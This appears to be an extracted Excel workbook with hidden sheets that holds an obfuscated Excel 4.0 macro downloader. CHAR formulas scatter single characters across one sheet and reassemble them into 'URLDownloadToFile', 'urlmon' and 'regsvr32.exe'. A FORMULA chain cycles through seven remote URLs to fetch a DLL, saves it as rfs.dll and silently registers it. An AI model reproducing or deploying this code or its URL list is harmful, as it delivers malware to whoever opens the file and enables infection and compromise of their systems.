{"text_format":"1","workbook":"xlsx","n_sheets":5,"sheets":["Sheet","Cdfea","Tgbs","Tgbfgs","PCWV"],"not_rendered":{"charts":0,"images":1,"macros":0,"external_links":0,"defined_names":8,"comments":0,"pivot_tables":0},"unopened":[],"bounds":{"document_bytes":16777216,"sheet_cells":100000,"rows_first":2000,"rows_last":500,"rows_between":2000,"halvings":0,"cell_chars":16384,"cell_head_chars":4096},"cells_cut":0,"cells_raw":0,"read":"whole","date_system":"1900"}

{"sheet":"Sheet","index":0,"n_rows":0,"n_cols":0,"rows_kept":0,"cut":false,"hidden":false,"merged":[]}

{"sheet":"Cdfea","index":1,"n_rows":37,"n_cols":17,"rows_kept":37,"cut":false,"hidden":true,"merged":[]}
[]
[null,null,null,null,{"$f":"CHAR(113-2)","v":"o"},null,{"$f":"CHAR(111-6)","v":"i"},null,null,null,null,{"$f":"CHAR(71-6)","v":"A"},null,null,null,"-"]
[null,null,{"$f":"CHAR(111+3)","v":"r"},null,null,null,null,null,{"$f":"CHAR(87-4)","v":"S"},null,null,null,null,null,null,{"$f":"CHAR(90+2)","v":"\\"}]
[null,null,null,null,null,{"$f":"CHAR(100-18)","v":"R"},null,{"$f":"CHAR(110-9)","v":"e"},null,null,1,null,null,{"$f":"CHAR(89-1)","v":"X"}]
[null,{"$f":"CHAR(115+2)","v":"u"},null,null,null,null,null,null,null,null,null,null,null,null,null,{"$f":"CHAR(44+2)","v":"."}]
[null,null,null,null,{"$f":"CHAR(90-6)","v":"T"},null,null,null,null,{"$f":"CHAR(77-3)","v":"J"}]
[null,null,null,{"$f":"CHAR(107+3)","v":"n"},null,3,null,null,null,null,null,null,{"$f":"CHAR(117-2)","v":"s"},null,null,{"$f":"CHAR(41+3)","v":","}]
[]
[null,null,{"$f":"CHAR(110-2)","v":"l"},null,null,null,null,{"$f":"CHAR(70-3)","v":"C"},null,null,{"$f":"CHAR(55-7)","v":"0"},null,null,null,null,{"$f":"CHAR(55+5)","v":"<"}]
[null,null,null,null,null,{"$f":"CHAR(123-4)","v":"w"}]
[null,null,null,null,{"$f":"CHAR(80+5)","v":"U"},null,null,null,null,{"$f":"CHAR(80-7)","v":"I"},null,{"$f":"CHAR(100-1)","v":"c"},null,null,null,{"$f":"CHAR(35+5)","v":"("}]
[{"$f":"CHAR(107+2)","v":"m"}]
[null,null,null,{"$f":"CHAR(72-4)","v":"D"},null,null,null,{"$f":"CHAR(68+1)","v":"E"},null,null,null,null,null,2,null,{"$f":"CHAR(36+5)","v":")"}]
[null,null,null,null,null,null,{"$f":"CHAR(124-4)","v":"x"},null,null,null,{"$f":"CHAR(70-4)","v":"B"}]
[null,{"$f":"CHAR(80-4)","v":"L"},null,null,null,{"$f":"CHAR(105-5)","v":"d"},null,null,null,null,null,null,null,null,null,{"$f":"CHAR(31+3)","v":"\""}]
[]
[null,null,null,{"$f":"CHAR(102-5)","v":"a"},null,null,null,null,{"$f":"CHAR(78+1)","v":"O"},null,"G",null,null,null,null,{"$f":"CHAR(40-2)","v":"&"}]
[null,{"$f":"CHAR(65+5)","v":"F"}]
[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,{"$f":"CHAR(32)","v":" "}]
[null,null,null,null,null,null,null,8,null,null,null,null,null,null,null,{"$f":"CHAR(52+6)","v":":"}]
[]
[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,{"$f":"CHAR(66-5)","v":"="}]
[null,null,null,null,null,null,null,null,null,null,{"$f":"CHAR(80-2)","v":"N"}]
[null,null,null,null,null,null,{"$f":"CHAR(84-2)","v":"R"},null,null,null,null,null,null,null,null,"!"]
[]
[null,null,null,null,null,null,null,null,{"$f":"CHAR(84)","v":"T"}]
[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,"/"]
[]
[]
[]
[]
[null,null,null,null,null,null,null,null,{"$f":"_xlfn.ARABIC(\"CXI\")","v":111}]
[null,null,null,null,null,null,null,null,null,null,null,null,null,null,{"$f":"_xlfn.ARABIC(\"LXVII\")","v":67}]
[]
[null,null,null,null,{"$f":"_xlfn.ARABIC(\"LXI\")","v":61}]
[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,{"$f":"_xlfn.ARABIC(\"CXIV\")","v":114}]
[null,null,null,null,null,null,null,null,null,null,{"$f":"_xlfn.ARABIC(\"CI\")","v":101}]

{"sheet":"Tgbs","index":2,"n_rows":21,"n_cols":18,"rows_kept":21,"cut":false,"hidden":true,"merged":[]}
[]
[]
[null,null,null,null,null,{"$f":"T(Cdfea!E2&Cdfea!D7&Cdfea!P15&Cdfea!P7&Cdfea!P15&Cdfea!E11&Cdfea!F4&Cdfea!B15&Cdfea!D13&Cdfea!E2)","v":"on\",\"URLDo"}]
[]
[]
[]
[null,null,null,{"$f":"T(Cdfea!P11&Cdfea!P15&Cdfea!B5&Cdfea!C3&Cdfea!C9&Cdfea!A12)","v":"(\"urlm"}]
[]
[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,{"$f":"T(Cdfea!P15&Cdfea!P7&Cdfea!P15&Cdfea!J6&Cdfea!J6&Cdfea!H9&Cdfea!H9&Cdfea!K14&Cdfea!K14&Cdfea!P15)","v":"\",\"JJCCBB\""}]
[null,null,null,null,null,null,null,null,{"$f":"T(Cdfea!D7&Cdfea!C9&Cdfea!E2&Cdfea!D17&Cdfea!F15&Cdfea!E6&Cdfea!E2&Cdfea!B18&Cdfea!G2&Cdfea!C9)","v":"nloadToFil"}]
[]
[]
[]
[null,null,null,null,null,"\"https://www.almoeqatar.com/cgi-bin/3g/\",",null,"\"http://www.lavameapp.com.ar/slide-images/7bzQevDGMld/\",",null,"\"http://cenaf.com.co/error/TpewL/\",",null,"\"http://baykusoglu.com.tr/wp-admin/317Sz3wZsYmAAmmL6/\","]
[]
[null,null,null,null,null,null,"\"http://www.ayelet.info/wp-admin/oHRoG0X9ubuNtQ/\",",null,"\"http://lista33rivera.uy/wp-content/jiBtjSaJMcM/\",",null,"\"http://pusatbahasa.unsyiah.ac.id/backup/qWzXJpGddclh4zZjt/\","]
[]
[]
[]
[]
[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,{"$f":"T(Cdfea!P19&Cdfea!P2&Cdfea!M7)","v":" -s"}]

{"sheet":"Tgbfgs","index":3,"n_rows":17,"n_cols":19,"rows_kept":17,"cut":false,"hidden":true,"merged":[]}
[]
[]
[]
[null,null,null,null,null,null,null,null,"r\"&\"eg\"&\"s\"&\"vr3\"&\"2.e\"&\"x\"&\"e"]
[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,"<0, "]
[]
[]
[null,null,null,null,null,null,null,null,null,null,null,null,null,"S\"&\"ysW\"&\"ow\"&\"64\\"]
[]
[null,null,null,null,null,null," ..\\rfs.dll"]
[]
[null,null,null,null,null,null,null,null,null,null,null,null,"\\W\"&\"ind\"&\"o\"&\"w\"&\"s\\"]
[]
[]
[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,"\"..\\rfs.dll"]
[null,null,null,null,null,"\",0,0)"]
[null,null,null,null,null,null,null,null,null,",0,"]

{"sheet":"PCWV","index":4,"n_rows":8,"n_cols":7,"rows_kept":8,"cut":false,"hidden":true,"merged":[]}
[]
[]
[]
[]
[]
[]
[]
[null,null,null,null,null,null,{"$f":"FORMULA(Cdfea!P22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S15&Tgbfgs!F16,G13)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&\"NEVR1\"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&\"NEVR2\"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!H14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&\"NEVR3\"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!I16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&\"NEVR4\"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G21)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&\"NEVR5\"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G23)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&\"NEVR6\"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&\"NEVR7\"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfea!I17&Cdfea!I3&Cdfea!H13&Cdfea!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FORMULA(Cdfea!P22&Cdfea!H13&Cdfea!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!H9&Cdfea!P20&Tgbfgs!M12&Tgbfgs!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!P13,G29)=FORMULA(Cdfea!P22&Cdfea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfea!K23&Cdfea!P11&Cdfea!P13,G34)","v":true}]